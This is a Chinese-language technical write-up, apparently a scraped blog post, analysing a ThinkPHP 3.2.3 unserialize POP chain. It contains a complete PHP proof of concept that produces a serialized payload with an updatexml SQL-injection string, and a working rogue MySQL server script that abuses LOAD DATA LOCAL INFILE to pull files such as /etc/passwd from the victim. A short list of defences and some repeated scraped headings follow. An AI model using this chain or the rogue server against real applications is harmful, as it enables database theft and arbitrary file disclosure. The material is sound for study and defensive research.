ThinkPHP 3.2.* POP链复现(SQL注入&文件读取)技术分析<\/h1>

环境搭建<\/h2>

所需环境<\/h3>
PHP版本: 5.4.45<\/li>
操作系统: Windows<\/li>
中间件: Apache<\/li>
ThinkPHP版本: 3.2.3<\/li>
数据库: MySQL<\/li>
工具: PHPstudy 8.1.1.3, PHPstorm<\/li> <\/ul>
测试环境配置<\/h3>
在Home模块下的index控制器中创建反序列化入口点：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>namespace<\/span> Home\Controller<\/span>;
<\/span><\/span>use<\/span> Think\Controller<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> IndexController<\/span> extends<\/span> Controller<\/span> {
<\/span><\/span>    public<\/span> function<\/span> index<\/span>($n) {
<\/span><\/span>        unserialize<\/span>(base64_decode<\/span>($n));
<\/span><\/span>        echo<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>POP链分析<\/h2>
反序列化入口点<\/h3>

查找__destruct<\/code>魔术方法作为入口<\/li>
定位到\/ThinkPHP\/Library\/Think\/Image\/Driver\/Imagick.class.php<\/code><\/li>
<\/ol>
调用链路径<\/h3>

Imagick::__destruct()<\/code> →<\/li>
Memcache::destroy()<\/code> →<\/li>
Model::delete()<\/code> →<\/li>
Driver::delete()<\/code> →<\/li>
Driver::execute()<\/code><\/li>
<\/ol>
关键节点分析<\/h3>
1. Imagick类中的__destruct方法<\/h4>
\/\/ ThinkPHP\/Library\/Think\/Image\/Driver\/Imagick.class.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> __destruct() {
<\/span><\/span>    empty<\/span>($this-><\/span>img<\/span>) ||<\/span> $this-><\/span>img<\/span>-><\/span>destroy<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
通过控制$this->img<\/code>可调用任意类的destroy<\/code>方法<\/li>
<\/ul>
2. Memcache类中的destroy方法<\/h4>
\/\/ ThinkPHP\/Library\/Think\/Session\/Driver\/Memcache.class.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> destroy<\/span>($sessID =<\/span> ''<\/span>) {
<\/span><\/span>    return<\/span> $this-><\/span>handle<\/span>-><\/span>delete<\/span>($this-><\/span>sessionName<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
通过控制$this->handle<\/code>可调用任意类的delete<\/code>方法<\/li>
$this->sessionName<\/code>可控，用于传递参数<\/li>
<\/ul>
3. Model类中的delete方法<\/h4>
\/\/ ThinkPHP\/Library\/Think\/Model.class.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> delete<\/span>($options=<\/span>array<\/span>()) {
<\/span><\/span>    $pk =<\/span> $this-><\/span>getPk<\/span>(); \/\/ $pk可控
<\/span><\/span><\/span><\/span>    \/\/ ...省略部分代码...
<\/span><\/span><\/span><\/span>    $result =<\/span> $this-><\/span>db<\/span>-><\/span>delete<\/span>($options);
<\/span><\/span>    return<\/span> $result;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
通过$this->db<\/code>可调用数据库驱动类的delete<\/code>方法<\/li>
$options<\/code>参数可通过$this->data[$pk]<\/code>控制<\/li>
<\/ul>
4. Driver类中的delete方法<\/h4>
\/\/ ThinkPHP\/Library\/Think\/Db\/Driver.class.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> delete<\/span>($options=<\/span>array<\/span>()) {
<\/span><\/span>    $table =<\/span> $this-><\/span>parseTable<\/span>($options['table'<\/span>]);
<\/span><\/span>    $sql =<\/span> 'DELETE FROM '<\/span>.<\/span>$table;
<\/span><\/span>    \/\/ ...构建SQL语句...
<\/span><\/span><\/span><\/span>    return<\/span> $this-><\/span>execute<\/span>($sql,!<\/span>empty<\/span>($options['fetch_sql'<\/span>]) ?<\/span> true<\/span> :<\/span> false<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
$options['table']<\/code>可控，导致SQL注入<\/li>
最终调用execute<\/code>方法执行SQL<\/li>
<\/ul>
5. execute方法关键点<\/h4>
public<\/span> function<\/span> execute<\/span>($str,$fetchSql=<\/span>false<\/span>) {
<\/span><\/span>    $this-><\/span>initConnect<\/span>(true<\/span>); \/\/ 初始化数据库连接
<\/span><\/span><\/span><\/span>    \/\/ ...执行SQL语句...
<\/span><\/span><\/span><\/span>    $this-><\/span>PDOStatement<\/span> =<\/span> $this-><\/span>_linkID<\/span>-><\/span>prepare<\/span>($str);
<\/span><\/span>    $result =<\/span> $this-><\/span>PDOStatement<\/span>-><\/span>execute<\/span>();
<\/span><\/span>    return<\/span> $result;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
可通过控制$this->config<\/code>连接恶意MySQL服务器<\/li>
利用MySQL的LOAD DATA LOCAL INFILE<\/code>特性读取文件<\/li>
<\/ul>
漏洞利用<\/h2>
1. SQL注入利用POC<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Think\Db\Driver<\/span>{
<\/span><\/span>    use<\/span> PDO<\/span>;
<\/span><\/span>    class<\/span> Mysql<\/span>{
<\/span><\/span>        protected<\/span> $options =<\/span> array<\/span>(
<\/span><\/span>            PDO<\/span>::<\/span>MYSQL_ATTR_LOCAL_INFILE<\/span> =><\/span> true<\/span>
<\/span><\/span>        );
<\/span><\/span>        protected<\/span> $config =<\/span> array<\/span>(
<\/span><\/span>            "debug"<\/span> =><\/span> 1<\/span>,
<\/span><\/span>            "database"<\/span> =><\/span> "mysql"<\/span>,
<\/span><\/span>            "hostname"<\/span> =><\/span> "127.0.0.1"<\/span>,
<\/span><\/span>            "hostport"<\/span> =><\/span> "3306"<\/span>,
<\/span><\/span>            "charset"<\/span> =><\/span> "utf8"<\/span>,
<\/span><\/span>            "username"<\/span> =><\/span> "root"<\/span>,
<\/span><\/span>            "password"<\/span> =><\/span> "root"<\/span>
<\/span><\/span>        );
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Think\Image\Driver<\/span>{
<\/span><\/span>    use<\/span> Think\Session\Driver\Memcache<\/span>;
<\/span><\/span>    class<\/span> Imagick<\/span>{
<\/span><\/span>        private<\/span> $img;
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>img<\/span> =<\/span> new<\/span> Memcache<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Think\Session\Driver<\/span>{
<\/span><\/span>    use<\/span> Think\Model<\/span>;
<\/span><\/span>    class<\/span> Memcache<\/span>{
<\/span><\/span>        protected<\/span> $handle;
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>handle<\/span> =<\/span> new<\/span> Model<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Think<\/span>{
<\/span><\/span>    use<\/span> Think\Db\Driver\Mysql<\/span>;
<\/span><\/span>    class<\/span> Model<\/span>{
<\/span><\/span>        protected<\/span> $options =<\/span> array<\/span>();
<\/span><\/span>        protected<\/span> $pk;
<\/span><\/span>        protected<\/span> $data =<\/span> array<\/span>();
<\/span><\/span>        protected<\/span> $db =<\/span> null<\/span>;
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>db<\/span> =<\/span> new<\/span> Mysql<\/span>();
<\/span><\/span>            $this-><\/span>options<\/span>['where'<\/span>] =<\/span> ''<\/span>;
<\/span><\/span>            $this-><\/span>pk<\/span> =<\/span> 'id'<\/span>;
<\/span><\/span>            $this-><\/span>data<\/span>[$this-><\/span>pk<\/span>] =<\/span> array<\/span>(
<\/span><\/span>                "table"<\/span> =><\/span> "mysql.user where 1=updatexml(1,concat(0x7e,substr((select group_concat(flag) from test.flag),1,32)),0)#"<\/span>,
<\/span><\/span>                "where"<\/span> =><\/span> "1=1"<\/span>
<\/span><\/span>            );
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span>{
<\/span><\/span>    echo<\/span> base64_encode<\/span>(serialize<\/span>(new<\/span> Think\Image\Driver\Imagick<\/span>()));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 文件读取利用<\/h3>
恶意MySQL服务器脚本<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> unhex<\/span>($str) {
<\/span><\/span>    return<\/span> pack<\/span>("H*"<\/span>, preg_replace<\/span>('#[^a-f0-9]+#si'<\/span>, ''<\/span>, $str));
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$filename =<\/span> "\/etc\/passwd"<\/span>;
<\/span><\/span>$srv =<\/span> stream_socket_server<\/span>("tcp:\/\/0.0.0.0:3306"<\/span>);
<\/span><\/span>
<\/span><\/span>while<\/span>(true<\/span>) {
<\/span><\/span>    echo<\/span> "Enter filename to get [<\/span>$filename<\/span>] > "<\/span>;
<\/span><\/span>    $newFilename =<\/span> rtrim<\/span>(fgets<\/span>(STDIN<\/span>), "<\/span>\r\n<\/span>"<\/span>);
<\/span><\/span>    if<\/span>(!<\/span>empty<\/span>($newFilename)) {
<\/span><\/span>        $filename =<\/span> $newFilename;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    echo<\/span> "[.] Waiting for connection on 0.0.0.0:3306<\/span>\n<\/span>"<\/span>;
<\/span><\/span>    $s =<\/span> stream_socket_accept<\/span>($srv, -<\/span>1<\/span>, $peer);
<\/span><\/span>    
<\/span><\/span>    echo<\/span> "[+] Connection from <\/span>$peer<\/span> - greet... "<\/span>;
<\/span><\/span>    fwrite<\/span>($s, unhex<\/span>('45 00 00 00 0a 35 2e 31 2e 36 33 2d 30 75 62 75 6e 74 75 30 2e 31 30 2e 30 34 2e 31 00 26 00 00 00 7a 42 7a 60 51 56 3b 64 00 ff f7 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 4c 2f 44 47 77 43 2a 43 56 63 72 00'<\/span>));
<\/span><\/span>    fread<\/span>($s, 8192<\/span>);
<\/span><\/span>    
<\/span><\/span>    echo<\/span> "auth ok... "<\/span>;
<\/span><\/span>    fwrite<\/span>($s, unhex<\/span>('07 00 00 02 00 00 00 02 00 00 00'<\/span>));
<\/span><\/span>    fread<\/span>($s, 8192<\/span>);
<\/span><\/span>    
<\/span><\/span>    echo<\/span> "some shit ok... "<\/span>;
<\/span><\/span>    fwrite<\/span>($s, unhex<\/span>('07 00 00 01 00 00 00 00 00 00 00'<\/span>));
<\/span><\/span>    fread<\/span>($s, 8192<\/span>);
<\/span><\/span>    
<\/span><\/span>    echo<\/span> "want file... "<\/span>;
<\/span><\/span>    fwrite<\/span>($s, chr<\/span>(strlen<\/span>($filename)+<\/span>1<\/span>).<\/span>"<\/span>\x00\x00\x01\xFB<\/span>"<\/span>.<\/span>$filename);
<\/span><\/span>    stream_socket_shutdown<\/span>($s, STREAM_SHUT_WR<\/span>);
<\/span><\/span>    
<\/span><\/span>    echo<\/span> "<\/span>\n<\/span>[+] <\/span>$filename<\/span> from <\/span>$peer<\/span>: <\/span>\n<\/span>"<\/span>;
<\/span><\/span>    $len =<\/span> fread<\/span>($s, 4<\/span>);
<\/span><\/span>    if<\/span>(!<\/span>empty<\/span>($len)) {
<\/span><\/span>        list<\/span>(, $len) =<\/span> unpack<\/span>("V"<\/span>, $len);
<\/span><\/span>        $len &=<\/span> 0xffffff<\/span>;
<\/span><\/span>        while<\/span>($len ><\/span> 0<\/span>) {
<\/span><\/span>            $chunk =<\/span> fread<\/span>($s, $len);
<\/span><\/span>            $len -=<\/span> strlen<\/span>($chunk);
<\/span><\/span>            echo<\/span> $chunk;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    echo<\/span> "<\/span>\n\n<\/span>"<\/span>;
<\/span><\/span>    fclose<\/span>($s);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>文件读取POC配置<\/h4>
修改Mysql<\/code>类的config<\/code>配置，指向恶意MySQL服务器：<\/p>
protected<\/span> $config =<\/span> array<\/span>(
<\/span><\/span>    "debug"<\/span> =><\/span> 1<\/span>,
<\/span><\/span>    "database"<\/span> =><\/span> "thinkphp"<\/span>,
<\/span><\/span>    "hostname"<\/span> =><\/span> "恶意服务器IP"<\/span>,
<\/span><\/span>    "hostport"<\/span> =><\/span> "3306"<\/span>,
<\/span><\/span>    "charset"<\/span> =><\/span> "utf8"<\/span>,
<\/span><\/span>    "username"<\/span> =><\/span> "任意用户名"<\/span>,
<\/span><\/span>    "password"<\/span> =><\/span> "任意密码"<\/span>
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

禁用危险函数<\/strong>：在生产环境中禁用unserialize<\/code>函数<\/li>
输入过滤<\/strong>：对所有用户输入进行严格过滤<\/li>
最小权限原则<\/strong>：数据库账户使用最小必要权限<\/li>
更新框架<\/strong>：升级到ThinkPHP最新版本<\/li>
配置安全<\/strong>：关闭PDO::MYSQL_ATTR_LOCAL_INFILE<\/code>选项<\/li>
<\/ol>
参考链接<\/h2>

ThinkPHP反序列化漏洞分析<\/a><\/li>
MySQL客户端文件读取漏洞分析<\/a><\/li>
<\/ol>
ThinkPHP 3.2.* POP链复现(SQL注入&文件读取)技术分析<\/h1>

环境搭建<\/h2>

POP链分析<\/h2>

关键节点分析<\/h3>

漏洞利用<\/h2>

2. 文件读取利用<\/h3>

参考链接<\/h2> ThinkPHP反序列化漏洞分析<\/a><\/li> MySQL客户端文件读取漏洞分析<\/a><\/li> <\/ol>

参考链接<\/h2>

ThinkPHP反序列化漏洞分析<\/a><\/li>
MySQL客户端文件读取漏洞分析<\/a><\/li> <\/ol>
